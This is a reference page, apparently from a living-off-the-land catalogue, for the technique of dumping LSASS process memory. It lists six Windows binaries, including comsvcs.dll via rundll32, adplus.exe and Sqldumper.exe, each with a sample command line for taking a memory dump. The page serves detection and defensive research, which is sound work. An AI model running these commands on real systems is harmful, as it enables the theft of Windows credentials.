T1003.001: Technique T1003.001
Adversaries may leverage living-off-the-land techniques (T1003.001) to achieve execution, evade defenses, or transfer tools.
Total Capable Binaries: 6
•
Windows: 6
•
Linux: 0
•
macOS: 0
Living-off-the-Land Matrix for T1003.001
Across 6 verified binariesWindows3 payloads
rdrleakdiag.exe
Microsoft Windows resource leak diagnostic tool
Sample Attack Vector:
rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1Windows1 payloads
Comsvcs.dll
COM+ Services
Sample Attack Vector:
rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin fullWindows4 payloads
adplus.exe
Debugging tool included with Windows Debugging Tools
Sample Attack Vector:
adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quietWindows1 payloads
Dump64.exe
Memory dump tool that comes with Microsoft Visual Studio
Sample Attack Vector:
dump64.exe {PID} out.dmpWindows1 payloads
DumpMinitool.exe
Dump tool part Visual Studio 2022
Sample Attack Vector:
DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType FullWindows2 payloads
Sqldumper.exe
Debugging utility included with Microsoft SQL.
Sample Attack Vector:
sqldumper.exe 464 0 0x0110Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point